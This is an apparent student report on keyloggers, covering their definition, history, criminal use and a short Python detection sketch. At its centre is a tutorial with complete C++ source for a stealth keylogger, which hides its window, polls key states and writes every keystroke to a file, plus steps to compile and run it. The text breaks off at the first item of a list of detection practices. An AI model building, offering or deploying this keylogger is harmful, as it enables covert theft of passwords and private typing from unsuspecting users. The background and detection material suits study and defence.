Keylogger Report
General overview of keyloggers
What are Keyloggers?
Keyloggers are a kind of malware that captures anything the user types on
the keyboard. They can also take images of the user's PC desktop and then
send the captured information to a predefined email or FTP address. In
many cases, a keylogger can spread via the network or flash memory. Hackers
use a wide range of programming languages to make keyloggers, such as C#,
VB, and Java. Many techniques have been developed for detecting keyloggers.
One technique that was introduced for dealing with keyloggers uses a
malicious profile to detect behavior similar to keylogger behavior. This
approach can fail because in many cases keyloggers use the Gmail service as
the predefined address and use "port 587" to send information via email.
This behavior is very similar to that of email software such as Outlook or
Firefox Sun Bird. Virtual keyboards are also designed to deal with
keyloggers [5]: when the user uses a virtual keyboard, the user's
information is not entered via the user's keyboard, so keyloggers cannot
capture anything. However, an advanced keylogger can take images of the PC
desktop, and the attacker can then guess the password. Another way of
dealing with keyloggers is to use a sequence of random characters. In this
technique the information captured by the keylogger contains the password,
but embedded in so much random junk that discovering it is infeasible.
However, this method uses a simple mechanism and an attacker may detect the
password [6]. Up-to-date antivirus and anti-adware tools can help greatly
in dealing with keyloggers, but we will show that this software can fail
against advanced keyloggers [7]. In many cases hackers use a wide range of
programming languages to make keyloggers, and antivirus software can detect
them by analyzing the behavior of suspicious files. In general, keyloggers
can be divided into detectable keyloggers and undetectable keyloggers.
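The port 587 ambiguity described above can be reduced by checking which process made the connection and what else that process is doing. The following Python sketch is an added example, not part of the original report; the telemetry records, field names, process names and the mail-client allowlist are constructed assumptions.

```python
from statistics import median

# Constructed endpoint telemetry (not from a real host). Hypothetical fields:
# image = process name, visible_window = has any visible window,
# remote_ports = outbound TCP ports, append_sizes = bytes per file append.
SAMPLE_EVENTS = [
    {"image": "outlook.exe", "visible_window": True,
     "remote_ports": [587, 443], "append_sizes": []},
    {"image": "updater_helper.exe", "visible_window": False,
     "remote_ports": [587], "append_sizes": [1, 1, 1, 7, 1, 1]},
    {"image": "backup.exe", "visible_window": False,
     "remote_ports": [443], "append_sizes": [4096, 8192]},
    {"image": "notes.exe", "visible_window": True,
     "remote_ports": [], "append_sizes": [1, 1, 2, 1]},
    {"image": "mailmerge.exe", "visible_window": True,
     "remote_ports": [587], "append_sizes": []},
]

# Assumption: the site keeps an allowlist of approved mail clients.
APPROVED_MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_SUBMISSION_PORT = 587

def indicators(event):
    """Return the independent keylogger-like signals present in one record."""
    found = []
    image = event["image"].lower()
    if SMTP_SUBMISSION_PORT in event["remote_ports"] and image not in APPROVED_MAIL_CLIENTS:
        found.append("smtp-587-from-unapproved-process")
    if not event["visible_window"]:
        found.append("no-visible-window")
    sizes = event["append_sizes"]
    # Many tiny appends look like per-keystroke logging, not bulk file I/O.
    if len(sizes) >= 4 and median(sizes) <= 8:
        found.append("keystroke-sized-appends")
    return found

def triage(events, threshold=2):
    """Flag processes showing at least `threshold` signals; one alone is weak."""
    flagged = {}
    for event in events:
        found = indicators(event)
        if len(found) >= threshold:
            flagged[event["image"]] = found
    return flagged

if __name__ == "__main__":
    for image, found in triage(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(found))
```

Each signal on its own also matches legitimate software (a mail-merge tool on port 587, a windowless backup job, a text editor saving small edits), which is why the sketch only flags a process when several coincide.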
History of the keylogger
In the mid-1970s, the Soviet Union developed and deployed a hardware
keylogger targeting typewriters. Termed the "selectric bug", it measured the
movements of the print head of IBM Selectric typewriters via subtle
influences on the regional magnetic field caused by the rotation and
movements of the print head.[35] An early keylogger was written by Perry
Kivolowitz and posted to the Usenet newsgroups net.unix-wizards,
net.sources on November 17, 1983.[36] The posting seems to be a motivating
factor in restricting access to /dev/kmem on Unix systems. The user-mode
program operated by locating and dumping character lists (clists) as they
were assembled in the Unix kernel.
How hackers use keyloggers
The first keyloggers were used by the Soviet Union in the 1970s to monitor
IBM electric typewriters used at embassies based in Moscow. They would
record what was typed and send the information back to Soviet intelligence
via radio signals.
Today spyware such as keystroke loggers is a common part of the
cyber-criminal toolset, used to capture financial information such as
banking and credit card details, personal information such as emails and
passwords or names and addresses, or sensitive business information around
processes or intellectual property. Attackers may sell that information or
use it as part of a larger attack, depending on what was gathered and their
motives.
Install Dev C++ on your system; the installation process is very simple.
Launch it after the installation; the interface should look like the image
below. Go to the File option at the top, where you will see New; from there
choose Source file, or click in the middle of the IDE and press CTRL+N.
Here is the source code for the C++ Keylogger:
#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
using namespace std;
void LOG(string input) {
fstream LogFile; LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << input;
LogFile.close();
}
}
bool SpecialKeys(int S_Key) {
switch (S_Key) {
case VK_SPACE: cout << " ";
LOG(" "); return true;
case VK_RETURN: cout << "\n";
LOG("\n"); return true;
case '¾': cout << ".";
LOG("."); return true;
case VK_SHIFT: cout << "#SHIFT#";
LOG("#SHIFT#");
return true;
case VK_BACK: cout << "\b";
LOG("\b"); return true;
case VK_RBUTTON: cout << "#R_CLICK#";
LOG("#R_CLICK#"); return true;
case VK_CAPITAL: cout << "#CAPS_LOCK#";
LOG("#CAPS_LCOK"); return true;
case VK_TAB: cout << "#TAB";
LOG("#TAB"); return true;
case VK_UP: cout << "#UP";
LOG("#UP_ARROW_KEY"); return true;
case VK_DOWN: cout << "#DOWN";
LOG("#DOWN_ARROW_KEY"); return true;
case VK_LEFT: cout << "#LEFT";
LOG("#LEFT_ARROW_KEY"); return true;
case VK_RIGHT: cout << "#RIGHT";
LOG("#RIGHT_ARROW_KEY"); return true;
case VK_CONTROL: cout << "#CONTROL";
LOG("#CONTROL"); return true;
case VK_MENU: cout << "#ALT";
LOG("#ALT"); return true;
default:
return false; }
}
int main(){
ShowWindow(GetConsoleWindow(), SW_HIDE);
char KEY = 'x';
while (true) {
Sleep(10); for (int KEY = 8;
KEY <= 190; KEY++) {
if (GetAsyncKeyState(KEY) == -32767) {
if (SpecialKeys(KEY) == false) {
fstream LogFile;
LogFile.open("dat.txt", fstream::app);
if (LogFile.is_open()) {
LogFile << char(KEY);
LogFile.close();
}
}
}
}
}
return 0;
}
Copy all of the C++ keylogger source code and paste it into the Dev C++ IDE.
To compile it, go to the Execute option and choose Compile, or
press the F9 function key; it will ask you for a location to save your keylogger.
Choose your location and save it to start the compilation process.
After successful compilation, you will see your keylogger in executable form in the folder you
chose when compiling the C++ keylogger source code.
Now test your keylogger: start the application. You will see nothing because it is coded to run in
stealth mode in the background. Open a browser and type something, then go to the C++
keylogger folder; you will see a text file called dat which has the information you typed.
The figure below shows the data in the dat file
It will keep running in the background unless you stop it. To close the C++ keylogger, open Task
Manager by pressing Ctrl+Alt+Del, select the keylogger and choose End task.
Conclusion and summary
6 best practices for detecting and removing keyloggers
1. Monitor resource allocation, processes and data